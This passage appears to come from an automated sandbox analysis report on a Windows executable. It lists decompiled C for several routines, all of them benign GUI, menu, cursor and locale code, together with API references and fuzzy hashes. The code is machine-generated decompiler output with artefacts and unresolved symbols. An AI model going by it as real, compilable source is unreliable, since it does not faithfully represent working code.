Part of subcall function 0042C744: SendMessageA.USER32 ref: 0042C760

SendMessageA.USER32 ref: 0042C991
SendMessageA.USER32 ref: 0042C9E3

Part of subcall function 0042C770: SendMessageA.USER32 ref: 0042C7B1
Part of subcall function 0042C770: SendMessageA.USER32 ref: 0042C7DD
Part of subcall function 0042C770: SendMessageA.USER32 ref: 0042C811

Part of subcall function 0042B758: SendMessageA.USER32 ref: 0042B76C

Part of subcall function 0042B77C: SendMessageA.USER32 ref: 0042B799
Part of subcall function 0042B77C: InvalidateRect.USER32(00000000,000000FF,000000FF), ref: 0042B7B6

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CountTick$InvalidateRect
String ID:
API String ID: 2080777977-0
Opcode ID: 00514c6290638135f1755ca037d6578518ff3b4938264617d2f35df0aa9d617a
Instruction ID: 11bde4e1897c2e49cbd936de07934a7eb30604cd500c9c0f211fc9ccb53c35b3
Opcode Fuzzy Hash: 00514c6290638135f1755ca037d6578518ff3b4938264617d2f35df0aa9d617a
Instruction Fuzzy Hash: 0B815C70A04158DBCF00EBA9D586BDEB7B5AF85304F6041B6E404BB392CB38AE05DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00433A84, Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00433A84(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x492ba8 != 0) {
					L3:
					_t49 =  *0x492b88; // 0x0
					_t50 =  *0x492b88; // 0x0
					_t117 = E00433964(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x492ba8 == 0) {
						_t168 =  *0x492bac;
						if( *0x492bac != 0) {
							_t106 =  *0x492b9c; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x492bac; // 0x0
							E0043DA18(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x492b88; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x492ba8;
						_t6 =  &_v24;
						 *_t6 =  *0x492ba8 != 0;
						__eflags =  *_t6;
						 *0x492ba8 = 2;
					} else {
						 *0x492ba8 = 1;
						_v24 = 0;
					}
					_t54 =  *0x492b8c; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x492b8c; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x492b8c; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x492b8c; // 0x0
							E004356B8( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x492b8c; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E004339B4(2);
						_t121 =  *_t155;
						_t60 =  *0x492b8c; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x492bac != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x492bac; // 0x0
								E0043D9D4(_t82, _t158);
								_t84 =  *0x492bac; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x492bac; // 0x0
									E0043DB00(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x492bac; // 0x0
									E0043DA18(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x492bac; // 0x0
								E0043DB74(_t91, _t131, __eflags);
								_t93 =  *0x491278; // 0x492c08
								SetCursor(E00453674( *_t93, _t158));
							}
						}
						_t62 =  *0x491278; // 0x492c08
						_t65 = SetCursor(E00453674( *_t62, _t158));
						if( *0x492ba8 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E004339F0(_t121);
								_t67 =  *0x492b8c; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E004356B8(_t118,  &_v24, _t155);
									_t65 = E004037D8(_t118, __eflags);
									_t135 =  *0x492b8c; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x492b8c; // 0x0
									_t65 = E004037D8( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x492b8c; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x492b8c; // 0x0
								_t65 = E004037D8( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x492b8c == 0) {
								goto L32;
							} else {
								_t119 =  *0x492b8c; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E004084F0(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x492b8c; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x492b8c; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x492b8c; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E004339B4(1);
					if( *0x492b8c == 0) {
						goto L32;
					}
					_t102 =  *0x492b8c; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x492b8c; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x492b8c; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E004339B4(0);
					if( *0x492b8c == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x492b98; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x492ba4; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x492b9c; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x492ba4; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

0x00433a8a
0x00433a93
0x00433ac2
0x00433ac2
0x00433ac8
0x00433ade
0x00433ae7
0x00433ae9
0x00433af0
0x00433af2
0x00433af8
0x00433b05
0x00433b0a
0x00433b0a
0x00433af0
0x00433b0f
0x00433b1b
0x00433b2b
0x00433b32
0x00433b32
0x00433b32
0x00433b37
0x00433b1d
0x00433b1d
0x00433b24
0x00433b24
0x00433b3e
0x00433b46
0x00433b93
0x00433b93
0x00433b9a
0x00433ba0
0x00433ba3
0x00433bac
0x00433bb4
0x00433bbc
0x00433bc1
0x00433bca
0x00433bd1
0x00433bd1
0x00433bdf
0x00433be1
0x00433be3
0x00433bed
0x00433bf6
0x00433bfa
0x00433c04
0x00433c09
0x00433c0e
0x00433c13
0x00433c17
0x00433c32
0x00433c37
0x00433c3c
0x00433c19
0x00433c1d
0x00433c24
0x00433c26
0x00433c2b
0x00433c2b
0x00433c43
0x00433c43
0x00433c48
0x00433c50
0x00433c5d
0x00433c5d
0x00433bfa
0x00433c65
0x00433c72
0x00433c7e
0x00433d51
0x00433d51
0x00433c84
0x00433c84
0x00433c86
0x00433ca7
0x00433ca9
0x00433cae
0x00433cb1
0x00433cb3
0x00433ce1
0x00433cf0
0x00433cf5
0x00433cfb
0x00433cb5
0x00433cbd
0x00433cc9
0x00433cce
0x00433cd4
0x00433cd4
0x00433c88
0x00433c8b
0x00433c8e
0x00433c9b
0x00433c9b
0x00433d05
0x00000000
0x00433d07
0x00433d07
0x00433d0d
0x00433d10
0x00433d18
0x00433d1f
0x00000000
0x00000000
0x00433d26
0x00433d28
0x00433d2f
0x00433d2f
0x00433d32
0x00433d39
0x00433d3c
0x00433d47
0x00433d48
0x00433d49
0x00433d4a
0x00000000
0x00433d4a
0x00433d05
0x00433c7e
0x00433b4a
0x00433b56
0x00000000
0x00000000
0x00433b5c
0x00433b61
0x00433b64
0x00433b6c
0x00433b6f
0x00433b76
0x00433b7c
0x00433b81
0x00433b8d
0x00000000
0x00000000
0x00000000
0x00433b8d
0x00433a95
0x00433a9c
0x00433aa1
0x00433aa7
0x00000000
0x00000000
0x00433aa9
0x00433ab1
0x00433ab4
0x00433ab6
0x00433abc
0x00000000
0x00000000
0x00000000

APIs

GetDesktopWindow.USER32 ref: 00433AF8
GetDesktopWindow.USER32 ref: 00433C1D
SetCursor.USER32(00000000), ref: 00433C72

Part of subcall function 0043DB74: 73451770.COMCTL32(00000000,?,00433C4D), ref: 0043DB90
Part of subcall function 0043DB74: ShowCursor.USER32(000000FF,00000000,?,00433C4D), ref: 0043DBAB

SetCursor.USER32(00000000), ref: 00433C5D

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$DesktopWindow$73451770Show
String ID:
API String ID: 3513720257-0
Opcode ID: 11b7e4f1413237eced4deb2d148f9e5fa6250a4fa388d30e17b224b1d1875de7
Instruction ID: 7296cc54ccdd903f39ca6ff1e78eba425dce0e2d0d4a0d4ed3677a73396da221
Opcode Fuzzy Hash: 11b7e4f1413237eced4deb2d148f9e5fa6250a4fa388d30e17b224b1d1875de7
Instruction Fuzzy Hash: 9C917EB4200241EFC704DF69DA84A16B7E5BB68315F14917BE8488B3B2D7B8FD45CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0044FA78, Relevance: 6.1, APIs: 4, Instructions: 148
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0044FA78(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x44fc3e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E00448D1C(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E0041C248(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E0043C4F8(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E0043C1F4(_t92), 0);
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E0043C4F8(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E0043C1F4(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E0043C4F8(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E0043C1F4(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E0043C1F4(_t92), _t70);
								}
								E00448D1C(_t113, E0043C1F4(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E00450B38(_t92, 1);
							}
							E0044F9B0(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x44fc45);
							return E00404348( &_v20);
						}
					}
				}
				_t77 =  *0x492c08; // 0x241094c
				_t79 = E004531FC(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x492c08; // 0x241094c
						if(_t113 ==  *((intOrPtr*)(E004531E8(_t81, _t111) + 0x248))) {
							_t83 =  *0x492c08; // 0x241094c
							if(_t92 != E004531E8(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x490f80; // 0x41d740
								E00406548(_t87,  &_v20);
								E0040A194(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00403DA8();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}

0x0044fa78
0x0044fa80
0x0044fa83
0x0044fa86
0x0044fa88
0x0044fa8c
0x0044fa8d
0x0044fa92
0x0044fa95
0x0044fa9a
0x0044fb0c
0x0044fb0c
0x0044fb14
0x0044fb18
0x0044fb18
0x0044fb21
0x0044fb2d
0x0044fb2d
0x0044fb2f
0x0044fb37
0x0044fb3d
0x0044fb3d
0x0044fb44
0x0044fbf7
0x0044fbfc
0x0044fbfe
0x0044fc0a
0x0044fc0a
0x00000000
0x0044fb5d
0x0044fb67
0x0044fb76
0x0044fbd0
0x0044fbd7
0x0044fbdb
0x0044fbe0
0x0044fbe2
0x0044fbee
0x0044fbee
0x0044fbe2
0x00000000
0x0044fbd7
0x00000000
0x0044fb78
0x0044fb78
0x0044fb81
0x0044fb8f
0x0044fb92
0x0044fb9c
0x0044fba1
0x0044fba3
0x0044fbad
0x0044fbb9
0x0044fbb9
0x0044fbc9
0x0044fbc9
0x0044fc0f
0x0044fc16
0x0044fc1c
0x0044fc1c
0x0044fc23
0x0044fc2a
0x0044fc2d
0x0044fc30
0x0044fc3d
0x0044fc3d
0x0044fb67
0x0044fb44
0x0044fa9c
0x0044faa6
0x0044faa9
0x0044faac
0x0044faaf
0x0044fab1
0x0044fab3
0x0044fac3
0x0044fac7
0x0044fad3
0x0044fad8
0x0044fadb
0x0044fae8
0x0044faed
0x0044fafc
0x0044fb01
0x0044fb01
0x0044fad3
0x0044fb06
0x0044fb07
0x0044fb07
0x0044fb07
0x0044fab1

APIs

GetMenu.USER32(00000000), ref: 0044FB9C
SetMenu.USER32(00000000,00000000), ref: 0044FBB9
SetMenu.USER32(00000000,00000000), ref: 0044FBEE
SetMenu.USER32(00000000,00000000,00000000,0044FC3E), ref: 0044FC0A

Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$LoadString
String ID:
API String ID: 3688185913-0
Opcode ID: c7402057d5051b8cebe982a6553d5c4c8eaad23a679fe6021d77e61103d795d6
Instruction ID: c504724d74a112fb591eb9aefa866a242ebe120f49003dff776dd0f675651a9d
Opcode Fuzzy Hash: c7402057d5051b8cebe982a6553d5c4c8eaad23a679fe6021d77e61103d795d6
Instruction Fuzzy Hash: 2451C030A002455BEB21EF69C89575A7795EF0A308F0441BBEC00AB39BCA7CEC49D76C

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE18, Relevance: 6.1, APIs: 4, Instructions: 95
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AE18() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x4927f0 = 0x409;
				 *0x4927f4 = 9;
				 *0x4927f8 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x4927f0 = _t14;
				}
				if(_t14 != 0) {
					 *0x4927f4 = _t14 & 0x3ff;
					 *0x4927f8 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x4760c0, 0x40af6c, 8 << 2);
				if( *0x4760ac != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x4927fd = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x4927fc = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040ADA0(__eflags, _t49);
					}
				} else {
					_t20 = E0040AE00();
					if(_t20 != 0) {
						 *0x4927fd = 0;
						 *0x4927fc = 0;
						return _t20;
					}
					E0040ADA0(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00403120(0x4760c0, 0x20, 0x40af6c);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x4927fc = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x4927fd = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x4927f0; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x4927fd = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}

0x0040ae24
0x0040ae2e
0x0040ae38
0x0040ae42
0x0040ae49
0x0040ae4b
0x0040ae4b
0x0040ae53
0x0040ae5f
0x0040ae6b
0x0040ae6b
0x0040ae7f
0x0040ae88
0x0040af37
0x0040af3c
0x0040af41
0x0040af48
0x0040af4d
0x0040af4f
0x0040af52
0x0040af58
0x0040af5a
0x00000000
0x0040af62
0x0040ae8e
0x0040ae8e
0x0040ae95
0x0040ae97
0x0040ae9e
0x00000000
0x0040ae9e
0x0040aeab
0x0040aebb
0x0040aebd
0x0040aec2
0x0040aec5
0x0040aecb
0x0040aecd
0x0040aecf
0x00000000
0x0040aecf
0x0040aedb
0x0040aee0
0x0040aee6
0x0040aee6
0x0040aee8
0x0040aee9
0x0040aeea
0x0040aeea
0x0040af06
0x0040af0c
0x0040af11
0x0040af16
0x0040af1c
0x0040af1c
0x0040af20
0x0040af23
0x0040af29
0x0040af2b
0x00000000
0x00000000
0x0040af2d
0x0040af30
0x0040af30
0x0040af31
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040af31
0x0040af1c
0x0040af69
0x0040af69
0x00000000

APIs

GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AF0C
GetThreadLocale.KERNEL32 ref: 0040AE42

Part of subcall function 0040ADA0: GetCPInfo.KERNEL32(00000000,?), ref: 0040ADB9

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocaleStringThreadType
String ID:
API String ID: 1505017576-0
Opcode ID: ce7ec5a9a682f0797289ff909420303f7e13cea0743a81b5261dbc3b0894185a
Instruction ID: 04793111fc7be30a39fe58eb12ebe0d5931bd910b9b8989f308f3dba402a2f44
Opcode Fuzzy Hash: ce7ec5a9a682f0797289ff909420303f7e13cea0743a81b5261dbc3b0894185a
Instruction Fuzzy Hash: 47313061588343AAD310D7A5A901BE23695FB60304F0880BBE484BB3C2D7BC485997AE

Uniqueness

Uniqueness Score: -1.00%

Function 0042370C, Relevance: 6.1, APIs: 4, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0042370C(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				struct HDC__* _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				struct HDC__* _t66;
				void* _t67;
				intOrPtr _t76;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;

				_t84 = _t86;
				_push(_t67);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E00420334(_v8);
					_push(_t84);
					_push(0x4237eb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					E00424A28( *((intOrPtr*)(_v8 + 0x58)));
					E00423588( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					_t47 = E00424C08( *((intOrPtr*)(_v8 + 0x58)));
					_push(0);
					L00406AE4();
					_t66 = _t47;
					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t81 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
					}
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
					_t82 =  *((intOrPtr*)(_t54 + 0x10));
					if(_t82 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						_push(0xffffffff);
						_push(_t82);
						_push(_t66);
						L00406C64();
						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
						_push(_t66);
						L00406C34();
					}
					E00420784(_v8, _t66);
					_t58 =  *0x476788; // 0x24106f4
					E004147C8(_t58, _t66, _t67, _v8, _t82);
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x4237f2);
					return E004205D8(_v8);
				}
			}

0x0042370d
0x0042370f
0x00423712
0x00423715
0x0042371c
0x004237f6
0x00423722
0x00423725
0x0042372c
0x0042372d
0x00423732
0x00423735
0x0042373e
0x0042374f
0x0042375a
0x0042375f
0x00423761
0x00423766
0x00423771
0x00423776
0x0042378c
0x00423778
0x00423782
0x00423782
0x00423795
0x00423798
0x0042379d
0x004237bb
0x0042379f
0x0042379f
0x004237a1
0x004237a2
0x004237a3
0x004237ab
0x004237ae
0x004237af
0x004237af
0x004237c3
0x004237cb
0x004237d0
0x004237d7
0x004237da
0x004237dd
0x004237ea
0x004237ea

APIs

Part of subcall function 00420334: RtlEnterCriticalSection.KERNEL32(00492A5C,00000000,0041EAD2,00000000,0041EB31), ref: 0042033C
Part of subcall function 00420334: RtlLeaveCriticalSection.KERNEL32(00492A5C,00492A5C,00000000,0041EAD2,00000000,0041EB31), ref: 00420349
Part of subcall function 00420334: RtlEnterCriticalSection.KERNEL32(00000038,00492A5C,00492A5C,00000000,0041EAD2,00000000,0041EB31), ref: 00420352

Part of subcall function 00424C08: 72E7AC50.USER32(00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424C5E
Part of subcall function 00424C08: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424C73
Part of subcall function 00424C08: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424C7D
Part of subcall function 00424C08: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424CA1
Part of subcall function 00424C08: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424CAC

72E7A590.GDI32(00000000,00000000,004237EB), ref: 00423761
SelectObject.GDI32(00000000,?), ref: 0042377A
72E7B410.GDI32(00000000,?,000000FF,00000000,00000000,004237EB), ref: 004237A3
72E7B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,004237EB), ref: 004237AF

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
String ID:
API String ID: 2198039625-0
Opcode ID: a6b07e79bba54b77734e57aec0895b87ffcb326ad74536c2a82c290a5aa750f6
Instruction ID: 98b0743b898854cd7558453ef2d812f50123e071f21bfe59adefa0e0869b5b3e
Opcode Fuzzy Hash: a6b07e79bba54b77734e57aec0895b87ffcb326ad74536c2a82c290a5aa750f6
Instruction Fuzzy Hash: F4310A74B04664EFDB04EF59D981D5DB3F5EF48714B6281A6F404AB362C638EE40DB44

Uniqueness

Uniqueness Score: -1.00%

Function 00449108, Relevance: 6.1, APIs: 4, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00449108(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E00448814(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E00448690(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E00448690(_t40, 1, _t37);
				}
